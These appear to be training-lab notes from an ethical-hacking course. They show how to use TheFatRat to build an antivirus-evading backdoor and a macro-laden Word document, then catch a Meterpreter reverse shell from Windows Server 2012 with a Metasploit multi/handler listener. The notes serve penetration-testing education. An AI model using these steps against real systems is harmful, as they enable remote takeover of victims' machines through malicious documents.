Module06 System Hacking
Module06 System Hacking
Hacking Windows Server 2012 with a Malicious Office Document Using TheFatRat
In Kali Linux, open fatrat
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[3] Create exe file with apache + Powershell (FUD 100%)
Set LHOST IP, LPORT(4444), Output file
Choose Payload option, choose [ 3 ] windows/meterpreter/reverse_tcp by typing
3
Type 8 and press Enter to go to the application main menu
[07] Create Backdoor For Office with Microsploit by typing 7
|2| The Microsoft Office Macro on Windows by typing 2
Set LHOST IP, LPORT(4444), Output file
In Enter the message for the document body (ENTER = default):, leave it to
default. In Are you want Use custom exe file backdoor (y/n) option type y.
Type /root/TheFatRat/output/payload.exe as Path
[ 3 ] windows/meterpreter/reverse_tcp by typing 3
Share the doc with web server.
msfconsole
Type use multi/handler and press Enter.
Type set payload windows/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.11 and press Enter.
Type set LPORT 4444 and press Enter.
run(start the listener)
Windows 2012, open the shared document in MS Word. Enable Content in the
Security Warning alert.
In Kali Linux, observe that one session is created or opened in the
Meterpreter shell. (if not type sessions -i 1)
sysinfo